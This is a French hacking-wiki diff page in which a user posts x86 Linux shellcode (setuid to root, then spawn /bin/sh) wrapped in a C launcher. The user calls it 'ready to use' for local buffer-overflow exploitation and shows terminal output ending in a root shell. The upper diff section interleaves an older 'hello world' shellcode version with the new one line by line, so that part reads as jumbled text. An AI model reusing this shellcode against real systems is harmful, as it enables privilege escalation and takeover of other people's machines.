« Hiteck » : différence entre les versions

De HackBBS
Aller à la navigation Aller à la recherche
Blackdevil (discussion | contributions)
Aucun résumé des modifications
Blackdevil (discussion | contributions)
Aucun résumé des modifications
 
(41 versions intermédiaires par le même utilisateur non affichées)
Ligne 1 : Ligne 1 :
<h2>Shellcoding</h2>
<p>
 
<b><u>Mercredi 23 juin 2010</u></b>


<p>
<b><u>Jeudi 17 juin 2010 :</u></b>
<br />
Je me lance dans la programmation de shellcode, je trouve les shellcodes super hard lol brefff au boulot :-D
<br />
Voila shellcode terminer mais d'abord je tiens a dire un grand remerciement a RootBSD qui m'a aider au débeuguage du shellcode, sans lui je ne serais pas arrivé merci a toi RootBSD.
<br /><br />
<br /><br />
Voila mon shellcode qui affiche hello world ! :-D<br /><br />


  #include <stdio.h><br />
Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D
<br /><br />
hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c<br />
  #include <stdio.h><br /><br />


char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\xeb\x05\x59\xb2\x0d\xcd\x80\xe8\xf6\xff\xff\xffHello world!";<br />
char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";<br /><br />


int main(void)<br />
int main(void)<br />
{<br />
{<br />
(*(void(*)()) shellcode)();<br />  
printf("\n[+] Exploit shellcode remote");<br />
}<br /><br />
printf("\n[+] Codé par hit3ck");<br />
Et voici un exemple :-D<br /><br />
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));<br />
hiteck@hiteck:~/Bureau/exploits/real$ ./shell<br />
(*(void(*)()) shellcode)();<br />
Hello world!<br />
}<br />
^C<br />
hiteck@hiteck:~/Bureau/Programmation$ ./exploit<br /><br />
hiteck@hiteck:~/Bureau/exploits/real$<br />
 
<br />
[+] Exploit shellcode remote<br />
Amusez vous bien, sur ce un vrai shellcode est en construction bye :-D.
[+] Codé par hit3ck<br />
[+] Taille: 33<br />
# whoami<br />
root<br />
# echo "Local exploit shellcode remote :-D"<br />
Local exploit shellcode remote :-D<br />
# exit<br />
hiteck@hiteck:~/Bureau/Programmation$ <br /><br />
Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.<br /><br />
</p>
</p>

Dernière version du 11 juin 2014 à 18:57

Mercredi 23 juin 2010

Voila mon nouveau exploit shellcode prêt à être utilisé pour une exploitation de buffer overflow en local :-D

hiteck@hiteck:~/Bureau/Programmation$ cat exploit.c
#include <stdio.h>

char shellcode[] = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(void)
{
printf("\n[+] Exploit shellcode remote");
printf("\n[+] Codé par hit3ck");
fprintf(stdout,"\n[+] Taille: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
hiteck@hiteck:~/Bureau/Programmation$ ./exploit

[+] Exploit shellcode remote
[+] Codé par hit3ck
[+] Taille: 33
# whoami
root
# echo "Local exploit shellcode remote :-D"
Local exploit shellcode remote :-D
# exit
hiteck@hiteck:~/Bureau/Programmation$

Attention le teste de l'exploit shellcode a eu les privilèges root au maximum, donc le programme a exploiter doit donc avoir less privilège root sinon c'est pas la peine.